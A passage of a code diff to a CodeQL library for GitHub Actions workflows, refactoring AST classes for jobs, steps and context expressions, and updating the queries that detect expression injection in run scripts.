string getExpression() { result = expression } + + string getRawExpression() { result = rawExpression } + + /** + * Gets the absolute coordinates of the expression. + */ + predicate expressionLocation(int sl, int sc, int el, int ec) { + exists(int lineDiff, string text, string style, Location loc | + text = value.getValue() and + loc = value.getLocation() and + lineDiff = loc.getEndLine() - loc.getStartLine() and + style = value.getStyle() + | + // eg: + // - run: echo "hello" + // - run: 'echo "hello"' + // - run: "echo 'hello'" + style = ["", "\"", "'"] and + lineDiff = 0 and + sl = loc.getStartLine() and + el = sl and + sc = loc.getStartColumn() + exprOffset and + ec = sc + rawExpression.length() - 1 + or + // eg: + // - run: "echo 'hello' + // echo 'hello'" + // - run: "echo 'hello' + // echo 'hello' + // echo 'hello'" + style = ["", "\"", "'"] and + lineDiff > 0 and + sl = loc.getStartLine() and + el = loc.getEndLine() and + sc = loc.getStartColumn() and + ec = loc.getEndColumn() + or + // eg: + // - run: | + // echo "hello" + // - run: | + // echo "hello" + // echo "bye" + style = "|" and + exists(int r | + ( + r > 0 and + partialLineLengthSum(text, r - 1) < exprOffset and + partialLineLengthSum(text, r) >= exprOffset and + sl = loc.getStartLine() + r + 1 and + el = sl and + sc = + key.getLocation().getStartColumn() + exprOffset - partialLineLengthSum(text, r - 1) + 2 - + 1 and + ec = sc + rawExpression.length() - 1 + or + r = 0 and + partialLineLengthSum(text, r) > exprOffset and + sl = loc.getStartLine() + r + 1 and + el = sl and + sc = key.getLocation().getStartColumn() + 2 + exprOffset and + ec = sc + rawExpression.length() - 1 + ) + ) + or + // eg: + // - run: > + // echo "hello" + // - run: > + // echo "hello" + // echo "hello" + style = ">" and + sl = loc.getStartLine() + 1 and + el = loc.getEndLine() and + sc = key.getLocation().getStartColumn() and + ec = loc.getEndColumn() + ) + } + + override Location getLocation() { + exists(Location loc | + this.hasLocationInfo(loc.getFile().getAbsolutePath(), loc.getStartLine(), + loc.getStartColumn(), loc.getEndLine(), loc.getEndColumn()) and + result = loc + ) + } + + predicate hasLocationInfo(string path, int sl, int sc, int el, int ec) { + path = value.getFile().getAbsolutePath() and + this.expressionLocation(sl, sc, el, ec) + } +} + +class CompositeActionImpl extends AstNodeImpl, TCompositeAction { + YamlMapping n; + + CompositeActionImpl() { this = TCompositeAction(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + // override AstNodeImpl getAChildNode() { + // result = this.getInputs() or + // result = this.getOutputs() or + // result = this.getRuns() + // } + override AstNodeImpl getParentNode() { none() } + + override string getAPrimaryQlClass() { result = "CompositeActionImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlMapping getNode() { result = n } + + RunsImpl getRuns() { result.getNode() = n.lookup("runs") } + + OutputsImpl getOutputs() { result.getNode() = n.lookup("outputs") } + + ExpressionImpl getAnOutputExpr() { result = this.getOutputs().getAnOutputExpr() } + + ExpressionImpl getOutputExpr(string name) { result = this.getOutputs().getOutputExpr(name) } + + InputsImpl getInputs() { result.getNode() = n.lookup("inputs") } + + InputImpl getAnInput() { n.lookup("inputs").(YamlMapping).maps(result.getNode(), _) } + + InputImpl getInput(string name) { + n.lookup("inputs").(YamlMapping).maps(result.getNode(), _) and + result.getNode().getValue() = name + } +} + +class WorkflowImpl extends AstNodeImpl, TWorkflowNode { + YamlMapping n; + + WorkflowImpl() { this = TWorkflowNode(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + // override AstNodeImpl getAChildNode() { + // result = this.getAJob() or + // result = this.getStrategy() or + // result = this.getEnv() or + // result = this.getPermissions() + // } + override AstNodeImpl getParentNode() { none() } + + override string getAPrimaryQlClass() { result = "WorkflowImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlMapping getNode() { result = n } + + // /** Gets the `jobs` mapping from job IDs to job definitions in this workflow. */ + // YamlMapping getJobs() { result = this.asYamlMapping().lookup("jobs") } + /** Gets the 'global' `env` mapping in this workflow. */ + EnvImpl getEnv() { result.getNode() = n.lookup("env") } + + /** Gets the name of the workflow. */ + string getName() { result = n.lookup("name").(YamlString).getValue() } + + /** Gets the job within this workflow with the given job ID. */ + JobImpl getJob(string jobId) { result.getWorkflow() = this and result.getId() = jobId } + + /** Gets a job within this workflow */ + JobImpl getAJob() { result = this.getJob(_) } + + /** Workflow is triggered by given trigger event */ + predicate hasTriggerEvent(string trigger) { + exists(YamlNode y | y = n.lookup("on").(YamlMappingLikeNode).getNode(trigger)) + } + + /** Gets the trigger event that starts this workflow. */ + string getATriggerEvent() { + exists(YamlNode y | y = n.lookup("on").(YamlMappingLikeNode).getNode(result)) + } + + /** Gets the permissions granted to this workflow. */ + PermissionsImpl getPermissions() { result.getNode() = n.lookup("permissions") } + + /** Gets the strategy for this workflow. */ + StrategyImpl getStrategy() { result.getNode() = n.lookup("strategy") } +} + +class ReusableWorkflowImpl extends AstNodeImpl, WorkflowImpl { + YamlValue workflow_call; + + ReusableWorkflowImpl() { + n.lookup("on").(YamlMappingLikeNode).getNode("workflow_call") = workflow_call + } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + // override AstNodeImpl getAChildNode() { + // result = super.getAChildNode() or + // result = this.getInputs() or + // result = this.getOutputs() + // } + OutputsImpl getOutputs() { result.getNode() = workflow_call.(YamlMapping).lookup("outputs") } + + ExpressionImpl getAnOutputExpr() { result = this.getOutputs().getAnOutputExpr() } + + ExpressionImpl getOutputExpr(string name) { result = this.getOutputs().getOutputExpr(name) } + + InputsImpl getInputs() { result.getNode() = workflow_call.(YamlMapping).lookup("inputs") } + + InputImpl getAnInput() { + workflow_call.(YamlMapping).lookup("inputs").(YamlMapping).maps(result.getNode(), _) + } + + InputImpl getInput(string name) { + workflow_call.(YamlMapping).lookup("inputs").(YamlMapping).maps(result.getNode(), _) and + result.getNode().(YamlString).getValue() = name + } +} + +class RunsImpl extends AstNodeImpl, TRunsNode { + YamlMapping n; + + RunsImpl() { this = TRunsNode(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + //override AstNodeImpl getAChildNode() { result = this.getAStep() } + override CompositeActionImpl getParentNode() { result.getAChildNode() = this } + + override string getAPrimaryQlClass() { result = "RunsImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlMapping getNode() { result = n } + + /** Gets the action that this `runs` mapping is in. */ + CompositeActionImpl getAction() { result = this.getParentNode() } + + /** Gets any steps that are defined within this job. */ + StepImpl getAStep() { result.getNode() = n.lookup("steps").(YamlSequence).getElementNode(_) } + + /** Gets the step at the given index within this job. */ + StepImpl getStep(int i) { result.getNode() = n.lookup("steps").(YamlSequence).getElementNode(i) } +} + +class InputsImpl extends AstNodeImpl, TInputsNode { + YamlMapping n; + + InputsImpl() { this = TInputsNode(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + //override AstNodeImpl getAChildNode() { result = this.getAnInput() } + override AstNodeImpl getParentNode() { result.getAChildNode() = this } + + override string getAPrimaryQlClass() { result = "InputsImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlMapping getNode() { result = n } + + InputImpl getAnInput() { n.maps(result.getNode(), _) } + + InputImpl getInput(string name) { + n.maps(result.getNode(), _) and + result.getNode().(YamlString).getValue() = name + } +} + +class InputImpl extends AstNodeImpl, TInputNode { + YamlValue n; + + InputImpl() { this = TInputNode(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + override InputsImpl getParentNode() { result.getAChildNode() = this } + + override string getAPrimaryQlClass() { result = "InputImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlScalar getNode() { result = n } +} + +class OutputsImpl extends AstNodeImpl, TOutputsNode { + YamlMapping n; + + OutputsImpl() { this = TOutputsNode(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + //override AstNodeImpl getAChildNode() { result = this.getAnOutputExpr() } + override AstNodeImpl getParentNode() { result.getAChildNode() = this } + + override string getAPrimaryQlClass() { result = "OutputsImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlMapping getNode() { result = n } + + /** Gets an output expression. */ + ExpressionImpl getAnOutputExpr() { result = this.getOutputExpr(_) } + + /** Gets a specific output expression by name. */ + ExpressionImpl getOutputExpr(string name) { + exists(YamlScalar l | + l = result.getParentNode().getNode() and + ( + n.lookup(name).(YamlMapping).lookup("value") = l or + n.lookup(name) = l + ) + ) + } + + string getAnOutputName() { n.maps(any(YamlString s | s.getValue() = result), _) } +} + +class PermissionsImpl extends AstNodeImpl, TPermissionsNode { + YamlMapping n; + + PermissionsImpl() { this = TPermissionsNode(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + override AstNodeImpl getParentNode() { result.getAChildNode() = this } + + override string getAPrimaryQlClass() { result = "PermissionsImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlMapping getNode() { result = n } +} + +class StrategyImpl extends AstNodeImpl, TStrategyNode { + YamlMapping n; + + StrategyImpl() { this = TStrategyNode(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + //override ExpressionImpl getAChildNode() { result = this.getAMatrixVarExpr() } + override AstNodeImpl getParentNode() { result.getAChildNode() = this } + + override string getAPrimaryQlClass() { result = "StrategyImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlMapping getNode() { result = n } + + /** Gets a specific matric expression (YamlMapping) by name. */ + ExpressionImpl getMatrixVarExpr(string name) { + n.lookup("matrix").(YamlMapping).lookup(name) = result.getNode() + } + + /** Gets a specific matric expression (YamlMapping) by name. */ + ExpressionImpl getAMatrixVarExpr() { + n.lookup("matrix").(YamlMapping).lookup(_) = result.getNode() + } +} + +class NeedsImpl extends AstNodeImpl, TNeedsNode { + YamlMappingLikeNode n; + + NeedsImpl() { this = TNeedsNode(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + override JobImpl getParentNode() { result.getNode().lookup("needs") = n } + + override string getAPrimaryQlClass() { result = "NeedsImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlMappingLikeNode getNode() { result = n } + + /** Gets a job that needs to be run before the job defining these needs. */ + JobImpl getANeededJob() { + result.getId() = n.getNode(_).(YamlString).getValue() and + result.getLocation().getFile() = n.getLocation().getFile() + } +} + +class JobImpl extends AstNodeImpl, TJobNode { + YamlMapping n; + string jobId; + WorkflowImpl workflow; + + JobImpl() { + this = TJobNode(n) and + workflow.getNode().lookup("jobs").(YamlMapping).lookup(jobId) = n + } + + // TODO: REMOVE + override string toString() { result = "Job: " + jobId } + + //override string toString() { result = n.toString() } + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + override WorkflowImpl getParentNode() { result.getAChildNode() = this } + + override string getAPrimaryQlClass() { result = "JobImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlMapping getNode() { result = n } + + /** Gets the ID of this job, as a string. */ + string getId() { result = jobId } + + /** Gets the workflow this job belongs to. */ + WorkflowImpl getWorkflow() { result = workflow } + + EnvImpl getEnv() { result.getNode() = n.lookup("env") } + + /** Gets a needed job. */ + JobImpl getANeededJob() { + exists(NeedsImpl needs | + needs.getParentNode() = this and + result = needs.getANeededJob() + ) + } + + /** Gets the declaration of the outputs for the job. */ + OutputsImpl getOutputs() { result.getNode() = n.lookup("outputs") } + + /** Gets a Job output expression. */ + ExpressionImpl getAnOutputExpr() { result = this.getOutputs().getAnOutputExpr() } + + /** Gets a Job output expression given its name. */ + ExpressionImpl getOutputExpr(string name) { result = this.getOutputs().getOutputExpr(name) } + + /** Gets the condition that must be satisfied for this job to run. */ + IfImpl getIf() { result.getNode() = n.lookup("if") } + + /** Gets the permissions for this job. */ + PermissionsImpl getPermissions() { result.getNode() = n.lookup("permissions") } + + /** Gets the strategy for this job. */ + StrategyImpl getStrategy() { result.getNode() = n.lookup("strategy") } +} + +class LocalJobImpl extends JobImpl { + LocalJobImpl() { n.maps(any(YamlString s | s.getValue() = "steps"), _) } + + /** Gets any steps that are defined within this job. */ + StepImpl getAStep() { result.getNode() = n.lookup("steps").(YamlSequence).getElementNode(_) } + + /** Gets the step at the given index within this job. */ + StepImpl getStep(int i) { result.getNode() = n.lookup("steps").(YamlSequence).getElementNode(i) } +} + +class StepImpl extends AstNodeImpl, TStepNode { + YamlMapping n; + + StepImpl() { this = TStepNode(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + override JobImpl getParentNode() { result.getAChildNode() = this } + + override string getAPrimaryQlClass() { result = "StepImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlMapping getNode() { result = n } + + EnvImpl getEnv() { result.getNode() = n.lookup("env") } + + /** Gets the ID of this step, if any. */ + string getId() { result = n.lookup("id").(YamlString).getValue() } + + /** Gets the value of the `if` field in this step, if any. */ + IfImpl getIf() { result.getNode() = n.lookup("if") } +} + +class IfImpl extends AstNodeImpl, TIfNode { + YamlValue n; + + IfImpl() { this = TIfNode(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + override AstNodeImpl getParentNode() { result.getAChildNode() = this } + + override string getAPrimaryQlClass() { result = "IfImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlScalar getNode() { result = n } + + /** Gets the condition that must be satisfied for this job to run. */ + string getCondition() { result = n.(YamlScalar).getValue() } +} + +class EnvImpl extends AstNodeImpl, TEnvNode { + YamlMapping n; + + EnvImpl() { this = TEnvNode(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + override AstNodeImpl getParentNode() { + result.(JobImpl).getEnv() = this or + result.(StepImpl).getEnv() = this or + result.(WorkflowImpl).getEnv() = this + } + + override string getAPrimaryQlClass() { result = "EnvImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlMapping getNode() { result = n } + + /** Gets an environment variable value given its name. */ + ScalarValueImpl getEnvVarValue(string name) { n.lookup(name) = result.getNode() } + + /** Gets an environment variable value. */ + ScalarValueImpl getAnEnvVarValue() { n.lookup(_) = result.getNode() } + + /** Gets an environment variable expressin given its name. */ + ExpressionImpl getEnvVarExpr(string name) { n.lookup(name) = result.getParentNode().getNode() } + + /** Gets an environment variable expression. */ + ExpressionImpl getAnEnvVarExpr() { n.lookup(_) = result.getParentNode().getNode() } +} + +abstract class UsesImpl extends AstNodeImpl { + abstract string getCallee(); + + abstract string getVersion(); + + abstract ExpressionImpl getArgumentExpr(string key); +} + +/** + * Gets a regular expression that parses an `owner/repo@version` reference within a `uses` field in an Actions job step. + * The capture groups are: + * 1: The owner of the repository where the Action comes from, e.g. `actions` in `actions/checkout@v2` + * 2: The name of the repository where the Action comes from, e.g. `checkout` in `actions/checkout@v2`. + * 3: The version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. + */ +private string usesParser() { result = "([^/]+)/([^/@]+)@(.+)" } + +/** A Uses step represents a call to an action that is defined in a GitHub repository. */ +class UsesStepImpl extends StepImpl, UsesImpl { + YamlScalar u; + + UsesStepImpl() { this.getNode().lookup("uses") = u } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + /** Gets the owner and name of the repository where the Action comes from, e.g. `actions/checkout` in `actions/checkout@v2`. */ + override string getCallee() { + result = + ( + u.getValue().regexpCapture(usesParser(), 1) + "/" + + u.getValue().regexpCapture(usesParser(), 2) + ).toLowerCase() + } + + /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ + override string getVersion() { result = u.getValue().regexpCapture(usesParser(), 3) } + + /** Gets the argument expression for the given key. */ + override ExpressionImpl getArgumentExpr(string key) { + result.getParentNode().getNode() = n.lookup("with").(YamlMapping).lookup(key) + } + + // TODO: REMOVE + override string toString() { + if exists(this.getId()) then result = "Uses Step: " + this.getId() else result = "Uses Step" + } +} + +/** + * Gets a regular expression that parses an `owner/repo@version` reference within a `uses` field in an Actions job step. + * local repo: octo-org/this-repo/.github/workflows/workflow-1.yml@172239021f7ba04fe7327647b213799853a9eb89 + * local repo: ./.github/workflows/workflow-2.yml + * remote repo: octo-org/another-repo/.github/workflows/workflow.yml@v1 + */ +private string repoUsesParser() { result = "([^/]+)/([^/]+)/([^@]+)@(.+)" } + +private string pathUsesParser() { result = "\\./(.+)" } + +class ExternalJobImpl extends JobImpl, UsesImpl { + YamlScalar u; + + ExternalJobImpl() { n.lookup("uses") = u } + + //override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + override string getCallee() { + if u.getValue().matches("./%") + then result = u.getValue().regexpCapture(pathUsesParser(), 1) + else + result = + u.getValue().regexpCapture(repoUsesParser(), 1) + "/" + + u.getValue().regexpCapture(repoUsesParser(), 2) + "/" + + u.getValue().regexpCapture(repoUsesParser(), 3) + } + + /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ + override string getVersion() { + exists(YamlString name | + n.lookup("uses") = name and + if not name.getValue().matches("\\.%") + then result = name.getValue().regexpCapture(repoUsesParser(), 4) + else none() + ) + } + + /** Gets the argument expression for the given key. */ + override ExpressionImpl getArgumentExpr(string key) { + result.getParentNode().getNode() = n.lookup("with").(YamlMapping).lookup(key) + } +} + +class RunImpl extends StepImpl { + YamlScalar script; + + RunImpl() { this.getNode().lookup("run") = script } + + string getScript() { result = script.getValue() } + + ExpressionImpl getAnScriptExpr() { result.getParentNode().getNode() = script } + + // TODO: REMOVE + override string toString() { + if exists(this.getId()) then result = "Run Step: " + this.getId() else result = "Run Step" + } +} + +/** + * A ${{}} expression accessing a context variable such as steps, needs, jobs, env, inputs, or matrix. + * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability + */ +abstract class ContextExpressionImpl extends ExpressionImpl { + // TODO: REMOVE + // ContextExpressionImpl() { + // expression + // .regexpMatch([ + // stepsCtxRegex(), needsCtxRegex(), jobsCtxRegex(), envCtxRegex(), inputsCtxRegex(), + // matrixCtxRegex() + // ]) + // } + abstract string getFieldName(); + + abstract AstNodeImpl getTarget(); +} + +private string stepsCtxRegex() { + result = wrapRegexp("steps\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") +} + +private string needsCtxRegex() { + result = wrapRegexp("needs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") +} + +private string jobsCtxRegex() { + result = wrapRegexp("jobs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") +} + +private string envCtxRegex() { result = wrapRegexp("env\\.([A-Za-z0-9_-]+)") } + +private string matrixCtxRegex() { result = wrapRegexp("matrix\\.([A-Za-z0-9_-]+)") } + +private string inputsCtxRegex() { + result = wrapRegexp(["inputs\\.([A-Za-z0-9_-]+)", "github\\.event\\.inputs\\.([A-Za-z0-9_-]+)"]) +} + +bindingset[regex] +private string wrapRegexp(string regex) { + result = ["\\b" + regex + "\\b", "fromJSON\\(" + regex + "\\)", "toJSON\\(" + regex + "\\)"] +} + +/** + * Holds for an expression accesing the `steps` context. + * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability + * e.g. `${{ steps.changed-files.outputs.all_changed_files }}` + */ +class StepsExpressionImpl extends ContextExpressionImpl { + string stepId; + string fieldName; + + StepsExpressionImpl() { + expression.regexpMatch(stepsCtxRegex()) and + stepId = expression.regexpCapture(stepsCtxRegex(), 1) and + fieldName = expression.regexpCapture(stepsCtxRegex(), 2) + } + + override string getFieldName() { result = fieldName } + + override AstNodeImpl getTarget() { + this.getLocation().getFile() = result.getLocation().getFile() and + result.(StepImpl).getId() = stepId + } +} + +/** + * Holds for an expression accesing the `needs` context. + * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability + * e.g. `${{ needs.job1.outputs.foo}}` + */ +class NeedsExpressionImpl extends ContextExpressionImpl { + JobImpl neededJob; + string fieldName; + + NeedsExpressionImpl() { + expression.regexpMatch(needsCtxRegex()) and + fieldName = expression.regexpCapture(needsCtxRegex(), 2) and + neededJob.getId() = expression.regexpCapture(needsCtxRegex(), 1) and + neededJob.getLocation().getFile() = this.getLocation().getFile() + } + + override string getFieldName() { result = fieldName } + + override AstNodeImpl getTarget() { + this.getEnclosingJob().getANeededJob() = neededJob and + ( + // regular jobs + neededJob.getOutputs() = result + or + // reusable workflow calling jobs + neededJob.(ExternalJobImpl) = result + ) + } +} + +/** + * Holds for an expression accesing the `jobs` context. + * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability + * e.g. `${{ jobs.job1.outputs.foo}}` (within reusable workflows) + */ +class JobsExpressionImpl extends ContextExpressionImpl { + string jobId; + string fieldName; + + JobsExpressionImpl() { + expression.regexpMatch(jobsCtxRegex()) and + jobId = expression.regexpCapture(jobsCtxRegex(), 1) and + fieldName = expression.regexpCapture(jobsCtxRegex(), 2) + } + + override string getFieldName() { result = fieldName } + + override AstNodeImpl getTarget() { + exists(JobImpl job | + job.getId() = jobId and + job.getLocation().getFile() = this.getLocation().getFile() and + job.getOutputs() = result + ) + } +} + +/** + * Holds for an expression the `inputs` context. + * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability + * e.g. `${{ inputs.foo }}` + */ +class InputsExpressionImpl extends ContextExpressionImpl { + string fieldName; + + InputsExpressionImpl() { + expression.regexpMatch(inputsCtxRegex()) and + fieldName = expression.regexpCapture(inputsCtxRegex(), 1) + } + + override string getFieldName() { result = fieldName } + + override AstNodeImpl getTarget() { + result.getLocation().getFile() = this.getLocation().getFile() and + ( + exists(ReusableWorkflowImpl w | w.getInput(fieldName) = result) + or + exists(CompositeActionImpl a | a.getInput(fieldName) = result) + ) + } +} + +/** + * Holds for an expression accesing the `env` context. + * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability + * e.g. `${{ env.foo }}` + */ +class EnvExpressionImpl extends ContextExpressionImpl { + string fieldName; + + EnvExpressionImpl() { + expression.regexpMatch(envCtxRegex()) and + fieldName = expression.regexpCapture(envCtxRegex(), 1) + } + + override string getFieldName() { result = fieldName } + + override AstNodeImpl getTarget() { + exists(AstNodeImpl s | + s.getInScopeEnvVarExpr(fieldName) = result and + s.getAChildNode*() = this + ) + } +} + +/** + * Holds for an expression accesing the `matrix` context. + * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability + * e.g. `${{ matrix.foo }}` + */ +class MatrixExpressionImpl extends ContextExpressionImpl { + string fieldName; + + MatrixExpressionImpl() { + expression.regexpMatch(matrixCtxRegex()) and + fieldName = expression.regexpCapture(matrixCtxRegex(), 1) + } + + override string getFieldName() { result = fieldName } + + override AstNodeImpl getTarget() { + exists(WorkflowImpl w | + w.getStrategy().getMatrixVarExpr(fieldName) = result and + w.getAChildNode*() = this + ) + or + exists(JobImpl j | + j.getStrategy().getMatrixVarExpr(fieldName) = result and + j.getAChildNode*() = this + ) + } +} diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index 8cd640ace09..f3785eada37 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -80,7 +80,7 @@ module Completion { } module CfgScope { - abstract class CfgScope extends WorkflowNode { } + abstract class CfgScope extends AstNode { } class WorkflowScope extends CfgScope instanceof Workflow { } @@ -215,7 +215,7 @@ private class StrategyTree extends StandardPreOrderTree instanceof Strategy { override ControlFlowTree getChildNode(int i) { result = rank[i](AstNode child, Location l | - child = super.getAMatrixVar() and l = child.getLocation() + child = super.getAMatrixVarExpr() and l = child.getLocation() | child order by @@ -224,15 +224,14 @@ private class StrategyTree extends StandardPreOrderTree instanceof Strategy { } } -private class JobTree extends StandardPreOrderTree instanceof Job { +private class JobTree extends StandardPreOrderTree instanceof LocalJob { override ControlFlowTree getChildNode(int i) { result = rank[i](AstNode child, Location l | ( child = super.getAStep() or child = super.getOutputs() or - child = super.getStrategy() or - child = super.getUses() + child = super.getStrategy() ) and l = child.getLocation() | @@ -261,7 +260,7 @@ private class RunTree extends StandardPreOrderTree instanceof Run { override ControlFlowTree getChildNode(int i) { result = rank[i](AstNode child, Location l | - (child = super.getInScopeEnvVarExpr(_) or child = super.getScript()) and + (child = super.getInScopeEnvVarExpr(_) or child = super.getAnScriptExpr()) and l = child.getLocation() | child @@ -271,10 +270,10 @@ private class RunTree extends StandardPreOrderTree instanceof Run { } } -private class StringValueTree extends StandardPreOrderTree instanceof StringValue { +private class ScalarValueTree extends StandardPreOrderTree instanceof ScalarValue { override ControlFlowTree getChildNode(int i) { result = - rank[i](ExpressionNode child, Location l | + rank[i](Expression child, Location l | child = super.getAChildNode() and l = child.getLocation() | @@ -289,6 +288,6 @@ private class UsesLeaf extends LeafTree instanceof Uses { } private class InputTree extends LeafTree instanceof Input { } -private class StringValueLeaf extends LeafTree instanceof StringValue { } +private class ScalarValueLeaf extends LeafTree instanceof ScalarValue { } -private class ExpressionLeaf extends LeafTree instanceof ExpressionNode { } +private class ExpressionLeaf extends LeafTree instanceof Expression { } diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 7cfde2a6f9f..fddf537ed1d 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -38,7 +38,7 @@ predicate runEnvToScriptStoreStep(DataFlow::Node pred, DataFlow::Node succ, Data c = any(DataFlow::FieldContent ct | ct.getName() = output.replaceAll("output\\.", "")) and r.getInScopeEnvVarExpr(varName) = pred.asExpr() and exists(string script, string line | - script = r.getScript().getValue() and + script = r.getScript() and line = script.splitAt("\n") and ( output = line.regexpCapture(".*::set-output\\s+name=(.*)::.*", 1) or diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 65e2abaa6c6..52c2ae6a483 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -243,7 +243,7 @@ predicate envCtxLocalStep(Node nodeFrom, Node nodeTo) { /** * Holds if there is a local flow step from `nodeFrom` to `nodeTo`. * For Actions, we dont need SSA nodes since it should be already in SSA form - * Local flow steps are always between two nodes in the same Cfg scope (job definition). + * Local flow steps are always between two nodes in the same Cfg scope. */ pragma[nomagic] predicate localFlowStep(Node nodeFrom, Node nodeTo) { diff --git a/ql/lib/ext/actions_github-script.model.yml b/ql/lib/ext/actions_github-script.model.yml index df5b1f70ae5..2ed2e03a34e 100644 --- a/ql/lib/ext/actions_github-script.model.yml +++ b/ql/lib/ext/actions_github-script.model.yml @@ -4,6 +4,3 @@ extensions: extensible: sinkModel data: - ["actions/github-script","*","input.script","expression-injection"] - - - diff --git a/ql/src/Debug/partial.ql b/ql/src/Debug/partial.ql index fbdf9ca7daa..fb31fe20990 100644 --- a/ql/src/Debug/partial.ql +++ b/ql/src/Debug/partial.ql @@ -15,7 +15,7 @@ import PartialFlow::PartialPathGraph private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource and - source.getLocation().getFile().getBaseName() = "argus_case_study.yml" + source.getLocation().getFile().getBaseName() = "test.yml" } predicate isSink(DataFlow::Node sink) { none() } diff --git a/ql/src/Security/CWE-020/CompositeActionsSinks.ql b/ql/src/Security/CWE-020/CompositeActionsSinks.ql index 096c19b48d0..1f90efa5bcc 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSinks.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSinks.ql @@ -18,7 +18,7 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { - exists(Run e | e.getScript().getAnExpression() = this.asExpr()) or + exists(Run e | e.getAnScriptExpr() = this.asExpr()) or externallyDefinedSink(this, "expression-injection") } } diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql index 040251045c8..d84566dab04 100644 --- a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql @@ -18,7 +18,7 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { - exists(Run e | e.getScript().getAnExpression() = this.asExpr()) or + exists(Run e | e.getAnScriptExpr() = this.asExpr()) or externallyDefinedSink(this, "expression-injection") } } diff --git a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql index 590660ce63b..fd4f03e1edd 100644 --- a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql +++ b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql @@ -19,7 +19,7 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { - exists(Run e | e.getScript().getAnExpression() = this.asExpr()) or + exists(Run e | e.getAnScriptExpr() = this.asExpr()) or externallyDefinedSink(this, "expression-injection") } } @@ -44,4 +44,4 @@ where .hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) select sink.getNode(), source, sink, "Potential expression injection in $@, which may be controlled by an external user.", sink, - sink.getNode().asExpr().(ExpressionNode).getExpression() + sink.getNode().asExpr().(Expression).getExpression() diff --git 